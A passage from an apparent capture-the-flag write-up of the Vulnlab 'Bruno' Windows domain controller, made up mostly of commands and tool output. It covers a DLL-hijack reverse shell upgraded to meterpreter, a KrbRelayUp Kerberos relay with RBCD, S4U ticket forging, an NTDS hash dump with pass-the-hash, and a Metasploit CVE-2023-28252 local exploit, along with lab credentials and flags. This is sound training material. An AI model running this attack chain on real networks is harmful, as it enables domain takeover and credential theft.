'hostfxr.zip' ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 1.9/1.9 kB • ? • 0:00:00
■[\\brunodc.bruno.vl\queue\]> ls
d------- 0.00 B 2025-01-28 11:09 .\
d------- 0.00 B 2022-06-29 22:41 ..\
-a------ 1.89 kB 2025-01-28 16:37 hostfxr.zip
■[\\brunodc.bruno.vl\queue\]> exit
After few times, we can see that our file has been correctly analyzed by the SampleScanner and found our malicious dll under the /app FTP folder:
$ ftp -i anonymous@brunodc.bruno.vl
Connected to brunodc.bruno.vl.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
229 Entering Extended Passive Mode (|||57649|)
150 Opening ASCII mode data connection.
01-28-25 07:37AM <DIR> app
06-29-22 04:33PM <DIR> benign
06-29-22 01:41PM <DIR> malicious
01-28-25 07:37AM <DIR> queue
226 Transfer complete.
ftp> cd app
250 CWD command successful.
ftp> dir
229 Entering Extended Passive Mode (|||57660|)
150 Opening ASCII mode data connection.
06-29-22 05:42PM 165 changelog
01-28-25 04:16PM 9216 hostfxr.dll
06-28-22 07:15PM 431 SampleScanner.deps.json
06-29-22 03:58PM 7168 SampleScanner.dll
06-29-22 03:58PM 174592 SampleScanner.exe
06-28-22 07:15PM 170 SampleScanner.runtimeconfig.dev.json
06-28-22 07:15PM 154 SampleScanner.runtimeconfig.json
226 Transfer complete.
ftp> quit
221 Goodbye.
We got our reverse shell then we upgrade it to have a full meterpreter shell as svc_scan:
msf6 exploit(multi/handler) > [*] Command shell session 1 opened (10.8.4.253:443 -> 10.10.106.103:57541) at 2025-01-28 16:38:59 +0900
msf6 exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell x64/windows Shell Banner: Microsoft Windows [Version 10.0.20348.768] ----- 10.8.4.253:443 -> 10.10.106.103:57541 (10.10.106.103)
msf6 exploit(multi/handler) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.8.4.253:4433
msf6 exploit(multi/handler) >
[*] Sending stage (203846 bytes) to 10.10.106.103
[*] Meterpreter session 2 opened (10.8.4.253:4433 -> 10.10.106.103:57695) at 2025-01-28 16:44:52 +0900
[*] Stopping exploit/multi/handler
msf6 exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell x64/windows Shell Banner: Microsoft Windows [Version 10.0.20348.768] ----- 10.8.4.253:443 -> 10.10.106.103:57541 (10.10.106.103)
2 meterpreter x64/windows BRUNO\svc_scan @ BRUNODC 10.8.4.253:4433 -> 10.10.106.103:57695 (10.10.106.103)
We grab the flag Bruno_User:
meterpreter > pwd
C:\Windows\system32
meterpreter > cd c:\\
meterpreter > pwd
c:\
meterpreter > dir
Listing: c:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2022-06-29 22:05:39 +0900 $Recycle.Bin
040777/rwxrwxrwx 0 dir 2022-06-15 14:51:59 +0900 $WinREAgent
100666/rw-rw-rw- 1 fil 2021-05-08 17:14:33 +0900 BOOTNXT
040777/rwxrwxrwx 8192 dir 2022-06-15 15:01:36 +0900 Boot
040777/rwxrwxrwx 0 dir 2021-08-19 08:34:55 +0900 Documents and Settings
000000/--------- 0 fif 1970-01-01 09:00:00 +0900 DumpStack.log.tmp
040777/rwxrwxrwx 0 dir 2021-08-19 15:24:49 +0900 EFI
040777/rwxrwxrwx 0 dir 2021-05-08 17:20:24 +0900 PerfLogs
040555/r-xr-xr-x 4096 dir 2022-06-30 01:15:21 +0900 Program Files
040777/rwxrwxrwx 4096 dir 2022-06-29 22:28:58 +0900 Program Files (x86)
040777/rwxrwxrwx 4096 dir 2025-01-28 09:59:28 +0900 ProgramData
040777/rwxrwxrwx 0 dir 2022-06-29 20:36:29 +0900 Recovery
040777/rwxrwxrwx 4096 dir 2022-06-29 22:23:34 +0900 System Volume Information
040555/r-xr-xr-x 4096 dir 2022-06-30 01:09:14 +0900 Users
040777/rwxrwxrwx 16384 dir 2022-06-29 22:32:51 +0900 Windows
100444/r--r--r-- 437498 fil 2022-06-15 14:56:49 +0900 bootmgr
040777/rwxrwxrwx 4096 dir 2022-06-29 23:43:53 +0900 inetpub
000000/--------- 0 fif 1970-01-01 09:00:00 +0900 pagefile.sys
040777/rwxrwxrwx 0 dir 2022-06-29 22:41:03 +0900 samples
100666/rw-rw-rw- 37 fil 2022-06-30 00:00:22 +0900 user.txt
meterpreter > cat c:\\user.txt
VL{6efd85f20df80e14a0452381657809e4}
Privilege Escalation
Check the privileges of svc_scan:
meterpreter > getprivs
Enabled Process Privileges
==========================
Name
----
SeChangeNotifyPrivilege
SeIncreaseWorkingSetPrivilege
SeMachineAccountPrivilege
We have only
SeMachineAccountPrivilegethat can be interesting
To be able to abuse this privilege, we need first to check the value of MachineAccountQuota to see if we have the capacity to create a new machine:
$ nxc ldap brunodc.bruno.vl -u 'svc_scan' -p 'Sunshine1' -M maq
SMB 10.10.106.103 445 BRUNODC [*] Windows Server 2022 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
LDAP 10.10.106.103 389 BRUNODC [+] bruno.vl\svc_scan:Sunshine1
MAQ 10.10.106.103 389 BRUNODC [*] Getting the MachineAccountQuota
MAQ 10.10.106.103 389 BRUNODC MachineAccountQuota: 10
Confirmed we can do it
We are thinking to proceed to a Kerberos relay attack, but we need to check if the LDAP does not have signing enabled:
$ nxc ldap brunodc.bruno.vl -u 'svc_scan' -p 'Sunshine1' -M ldap-checker
SMB 10.10.106.103 445 BRUNODC [*] Windows Server 2022 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
LDAP 10.10.106.103 389 BRUNODC [+] bruno.vl\svc_scan:Sunshine1
LDAP-CHE... 10.10.106.103 389 BRUNODC LDAP Signing NOT Enforced!
LDAP-CHE... 10.10.106.103 389 BRUNODC LDAPS Channel Binding is set to "NEVER"
Good, LDAP Signing is NOT enforced
Check if Defender or MDE is present and enabled:
meterpreter > shell
Process 4848 created.
Channel 2 created.
Microsoft Windows [Version 10.0.20348.768]
(c) Microsoft Corporation. All rights reserved.
c:\>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\> Get-MpComputerStatus
Get-MpComputerStatus
AMEngineVersion : 0.0.0.0
AMProductVersion : 4.18.2203.5
AMRunningMode : Not running
AMServiceEnabled : False
AMServiceVersion : 0.0.0.0
AntispywareEnabled : False
AntispywareSignatureAge : 4294967295
AntispywareSignatureLastUpdated :
AntispywareSignatureVersion : 0.0.0.0
AntivirusEnabled : False
AntivirusSignatureAge : 4294967295
AntivirusSignatureLastUpdated :
AntivirusSignatureVersion : 0.0.0.0
BehaviorMonitorEnabled : False
ComputerID : B552A93F-D382-4543-A7C7-AA0CEC3B91E1
ComputerState : 0
DefenderSignaturesOutOfDate : False
DeviceControlDefaultEnforcement : N/A
DeviceControlPoliciesLastUpdated : 1/1/1601 12:00:00 AM
DeviceControlState : N/A
FullScanAge : 4294967295
FullScanEndTime :
FullScanOverdue : False
FullScanRequired : False
FullScanSignatureVersion :
FullScanStartTime :
IoavProtectionEnabled : False
IsTamperProtected : False
IsVirtualMachine : True
LastFullScanSource : 0
LastQuickScanSource : 0
NISEnabled : False
NISEngineVersion : 0.0.0.0
NISSignatureAge : 4294967295
NISSignatureLastUpdated :
NISSignatureVersion : 0.0.0.0
OnAccessProtectionEnabled : False
ProductStatus : 1
QuickScanAge : 4294967295
QuickScanEndTime :
QuickScanOverdue : False
QuickScanSignatureVersion :
QuickScanStartTime :
RealTimeProtectionEnabled : False
RealTimeScanDirection : 0
RebootRequired : False
TamperProtectionSource : Signatures
TDTMode : N/A
TDTStatus : N/A
TDTTelemetry : N/A
PSComputerName :
Lucky as
RealTimeProtectionEnabled: False
KrbRelay with RBCD Privilege Escalation (Bruno_Root)
A Kerberos relay attack is essentially an authentication attack much like NTLM relay that allows us to relay a domain objects Kerberos authentication to another service. This essentially allows us to relay an ASREQ to any SPN that we need to authenticate to. Where LDAP signing essentially plays a picture into this is that it will encrypt all traffic over LDAP, meaning we won’t be able to properly sniff the traffic for authentication tokens as a MITM. If you want to delve into more information about Kerberos Relaying and how it works, this was the blog post I used mainly as research into the topic.
In our case, we should be able to create a fake domain computer object and coerce an authentication attempt using RBCD. The only issue is, how do we do coerce authentication if we’re using Kerberos authentication? This is where the idea of abusing CLSIDs comes into play, as CLSIDs are essentially identifiers for application components in Windows. These are predefined by the Windows operating system, meaning we can use a curated list here or here. We’re specifically looking for one that works with Windows Server 2019/2022, as that is the current operating system that we’re on.
In particular, the CLSID I picked was d99e6e73-fc88-11d0-b498-00a0c90312f3.
So let’s do it.
- Download KrbRelayUp and compile it using Visual Studio:
$ git clone https://github.com/Dec0ne/KrbRelayUp.git
- Upload it to our target:
meterpreter > pwd
c:\windows\tasks
meterpreter > upload KrbRelayUp.exe
[*] Uploading : /home/user/Downloads/VULNLAB/BRUNO/KrbRelayUp.exe -> KrbRelayUp.exe
[*] Uploaded 401.50 KiB of 401.50 KiB (100.0%): /home/user/Downloads/VULNLAB/BRUNO/KrbRelayUp.exe -> KrbRelayUp.exe
[*] Completed : /home/user/Downloads/VULNLAB/BRUNO/KrbRelayUp.exe -> KrbRelayUp.exe
- Execute it on the target machine using the CLSID that we have selected:
PS C:\windows\tasks> .\KrbRelayUp.exe relay -Domain bruno.vl -CreateNewComputerAccount -ComputerName pwn$ -ComputerPassword Azerty123! --clsid d99e6e73-fc88-11d0-b498-00a0c90312f3
KrbRelayUp - Relaying you to SYSTEM
[+] Rewriting function table
[+] Rewriting PEB
[+] Init COM server
[+] Computer account "pwn$" added with password "Azerty123!"
[+] Looking for available ports..
[+] Port 10246 available
[+] Register COM server
[+] Forcing SYSTEM authentication
[+] Got Krb Auth from NT/SYSTEM. Relying to LDAP now...
[+] LDAP session established
[+] RBCD rights added successfully
[+] Run the spawn method for SYSTEM shell:
./KrbRelayUp.exe spawn -m rbcd -d bruno.vl -dc brunodc.bruno.vl -cn pwn$ -cp Azerty123!
- Get a TGS on behalf of the Administrator account to CIFS using our fake machine account.:
$ impacket-getST -spn cifs/brunodc.bruno.vl -impersonate Administrator -dc-ip brunodc.bruno.vl bruno.vl/'pwn$':'Azerty123!'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_brunodc.bruno.vl@BRUNO.VL.ccache
- Inject the ticket to our global environement variable:
$ export KRB5CCNAME=Administrator@cifs_brunodc.bruno.vl@BRUNO.VL.ccache
$ klist
Ticket cache: FILE:Administrator@cifs_brunodc.bruno.vl@BRUNO.VL.ccache
Default principal: Administrator@bruno.vl
Valid starting Expires Service principal
01/28/2025 17:30:18 01/29/2025 03:30:17 cifs/brunodc.bruno.vl@BRUNO.VL
renew until 01/29/2025 17:30:17
We double check to be sure we can use it:
$ nxc smb brunodc.bruno.vl --use-kcache --kdcHost brunodc.bruno.vl
SMB brunodc.bruno.vl 445 BRUNODC [*] Windows Server 2022 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
SMB brunodc.bruno.vl 445 BRUNODC [+] bruno.vl\Administrator from ccache (Pwn3d!)
Confirmed
Then we can grab the flag Bruno_Root:
$ nxc winrm brunodc.bruno.vl --use-kcache --kdcHost brunodc.bruno.vl -X 'type c:\users\administrator\desktop\root.txt'
WINRM brunodc.bruno.vl 5985 BRUNODC [*] Windows Server 2022 Build 20348 (name:BRUNODC) (domain:bruno.vl)
WINRM brunodc.bruno.vl 5985 BRUNODC [-] Execute command failed, error: 'NoneType' object has no attribute 'execute_ps'
Hummm for an unknown reason that failed.
Anyway, we use it to grab the Administrator’s hash:
$ nxc smb brunodc.bruno.vl --use-kcache --kdcHost brunodc.bruno.vl --ntds --user Administrator
SMB brunodc.bruno.vl 445 BRUNODC [*] Windows Server 2022 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
SMB brunodc.bruno.vl 445 BRUNODC [+] bruno.vl\Administrator from ccache (Pwn3d!)
SMB brunodc.bruno.vl 445 BRUNODC [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB brunodc.bruno.vl 445 BRUNODC Administrator:500:aad3b435b51404eeaad3b435b51404ee:13735c7d60b417421dc6130ac3e0bfd4:::
SMB brunodc.bruno.vl 445 BRUNODC [+] Dumped 1 NTDS hashes to /home/user/.nxc/logs/BRUNODC_brunodc.bruno.vl_2025-01-28_182209.ntds of which 1 were added to the database
And finally grab the vlag:
$ nxc winrm brunodc.bruno.vl -u Administrator -H '13735c7d60b417421dc6130ac3e0bfd4' -X 'type c:\users\administrator\desktop\root.txt'
WINRM 10.10.106.103 5985 BRUNODC [*] Windows Server 2022 Build 20348 (name:BRUNODC) (domain:bruno.vl)
WINRM 10.10.106.103 5985 BRUNODC [+] bruno.vl\Administrator:13735c7d60b417421dc6130ac3e0bfd4 (Pwn3d!)
WINRM 10.10.106.103 5985 BRUNODC [+] Executed command (shell type: powershell)
WINRM 10.10.106.103 5985 BRUNODC VL{b528ba689d85ca396374c0f186087a7d}
Extra
Unintended way - CVE-2023-28252 (Bruno_Root)
The targeted Windows Server is vulnerable to the CVE-2023-28252.
This Windows zero-day vulnerability targets the Common Log File System (CLFS) and allows attackers to escalate privileges and potentially fully compromise an organization’s Windows systems.
More information:
From our Meterpreter session as svc_scan, we can escalate our local privileges to become Administrator using the embedded exploit below:
msf6 exploit(windows/local/cve_2023_28252_clfs_driver) > exploit
[*] Started reverse TCP handler on X:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The target is running windows version: 10.0.20348.0 which has a vulnerable version of clfs.sys installed by default
[*] Launching netsh to host the DLL...
[+] Process 2556 launched.
[*] Reflectively injecting the DLL into 2556...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (201798 bytes) to 10.10.106.103
[*] Meterpreter session 2 opened (X:4444 -> 10.10.106.103:51517) at 2025-01-28 18:49:10 +0900
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Challenge solved! Use this link to share it: https://api.vulnlab.com/api/v1/share?id=3629f667-eed8-4560-803e-b0fb40e8ace8

